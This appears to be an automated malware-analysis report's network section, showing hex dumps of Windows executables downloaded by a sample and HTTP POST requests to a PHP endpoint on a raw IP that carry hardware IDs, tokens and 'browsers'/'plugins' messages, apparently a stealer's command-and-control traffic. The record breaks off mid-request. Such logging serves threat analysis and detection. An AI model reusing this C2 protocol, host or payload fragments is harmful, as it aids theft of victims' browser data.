00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 10:01:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:01:19 GMTContent-Type: application/octet-streamContent-Length: 1904640Last-Modified: Sat, 27 Jul 2024 09:24:52 GMTConnection: keep-aliveETag: "66a4bce4-1d1000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 1b 6c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 75 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 75 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6f 78 75 70 67 71 6a 00 00 1a 00 00 80 31 00 00 f8 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 61 70 61 70 73 64 7a 00 10 00 00 00 80 4b 00 00 04 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 ee 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:01:22 GMTContent-Type: application/octet-streamContent-Length: 1933824Last-Modified: Sat, 27 Jul 2024 09:25:27 GMTConnection: keep-aliveETag: "66a4bd07-1d8200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 e4 81 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 d6 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 d5 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 79 77 7a 71 78 75 6c 00 70 1a 00 00 70 32 00 00 68 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 70 78 69 77 68 63 65 00 10 00 00 00 e0 4c 00 00 04 00 00 00 5c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:02:04 GMTContent-Type: application/octet-streamContent-Length: 249856Last-Modified: Sat, 27 Jul 2024 09:53:14 GMTConnection: keep-aliveETag: "66a4c38a-3d000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 67 94 73 10 06 fa 20 10 06 fa 20 10 06 fa 20 7f 70 51 20 0b 06 fa 20 7f 70 64 20 00 06 fa 20 7f 70 50 20 74 06 fa 20 19 7e 69 20 1b 06 fa 20 10 06 fb 20 64 06 fa 20 7f 70 55 20 11 06 fa 20 7f 70 60 20 11 06 fa 20 7f 70 67 20 11 06 fa 20 52 69 63 68 10 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8c 43 f1 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 76 03 02 00 00 00 00 f9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 71 80 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 59 02 00 78 00 00 00 00 c0 04 02 e0 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 5a 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 54 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 33 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 75 66 75 63 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 69 78 65 72 61 79 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 99 00 00 00 c0 04 02 00 9a 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 10:02:07 GMTContent-Type: application/octet-streamContent-Length: 3206656Last-Modified: Sat, 27 Jul 2024 09:24:03 GMTConnection: keep-aliveETag: "66a4bcb3-30ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 95 bc a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 28 ef ad 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 ae 00 00 04 00 00 31 92 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 50 8c 00 9b 0e 00 00 ec 5e 8c 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 50 8c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 8c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 c0 78 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 f0 21 00 00 20 8c 00 00 e6 21 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 32 35 45 38 39 44 38 30 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="hwid"B125E89D806E2371543510------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build"sila------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="message"browsers------HIIIECAAKECFHIECBKJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="message"plugins------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 